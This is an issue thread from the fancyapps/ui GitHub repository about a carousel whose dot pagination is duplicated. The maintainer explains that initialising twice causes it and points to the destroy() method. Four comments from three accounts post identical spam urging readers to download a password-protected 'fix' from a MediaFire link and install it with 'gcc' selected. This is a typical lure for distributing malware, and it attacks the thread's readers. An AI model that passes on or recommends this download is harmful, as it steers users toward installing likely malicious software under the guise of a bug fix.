### ISSUE TITLE
Dots pagination is duplicated

### ISSUE THREAD

**Issue by yarovikov** [fancyapps/ui#685]
### Describe the bug

Hi there

I'm using "@fancyapps/ui": "^5.0.36", yarn, bud.

Currently i see this in the browser console

<img width="881" alt="Screenshot 2024-08-27 at 10 39 40" src="https://github.com/user-attachments/assets/214d9816-b840-4e60-a5c3-8c2b829dd4ef">

My code

```js
import domReady from '@roots/sage/client/dom-ready';
import {Carousel} from "@fancyapps/ui/dist/carousel/carousel.esm.js";
import "@fancyapps/ui/dist/carousel/carousel.css";
import "@fancyapps/ui/dist/fancybox/fancybox.css";

domReady(async () => {
  initSliders();
});

function initSliders() {
  document.querySelectorAll('.slider-block').forEach((block) => {
    const container = block.querySelector('.f-carousel');
    if (!(container instanceof HTMLElement)) {
      return;
    }

    const options = {
      infinite: true,
      Dots: {
        minCount: 1,
        classes: {
          list: 'f-carousel__dots prevent-default',
        }
      },
    };

    new Carousel(container, options);
  });
}
```

Any ideas? Thanks :)

### Reproduction

Just use my code

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by fancyapps** [comment]
Hi. You have to call the `destroy()` method when your component is unloaded, otherwise multiple instances will be initialized on the same element, creating multiple additional HTML elements each time. 

So, do smth like this : 

```js
myCarousel = new Carousel(container, options);
```

and later

```js
myCarousel.destroy();
```

Demo - https://stackblitz.com/edit/react-ts-zfff59?file=Carousel.tsx

**Comment by yarovikov** [comment]
@fancyapps hi, 

huh, seems this is not working as well

i have a few sliders on the page, first is initialised without custom dots classes. Rest sliders are not working. 

```js
document.querySelectorAll('.gallery-block').forEach((block) => {
    initSlider(block);
  });
```

```js
export default function (block) {
  const container = block.querySelector('.f-carousel');
  if (!(container instanceof HTMLElement)) {
    return;
  }

  const options = {
    infinite: true,
    Dots: {
      minCount: 1,
      classes: {
        list: 'f-carousel__dots prevent-default',
      }
    },
  };

  const slider = new Carousel(container, options);
  slider.destroy();
}
```

**Comment by fancyapps** [comment]
I don't understand what you expected when you immediately destroyed the newly created carousel.

It looks like you are new to React and programming in general, so, please, learn about the `useEffect' hook first and take a look at the demo I gave you earlier.

**Comment by yarovikov** [comment]
@fancyapps i don't use react..

**Comment by fancyapps** [comment]
Well, that was my only guess, I can't think of any other reason without seeing your page. 
As you can see in any demo you can find in the docs, it just works fine (unless you call `Carousel()` multiple times on the same DOM element).

**Comment by yarovikov** [comment]
@fancyapps thanks for your answer, seems i know how to fix it
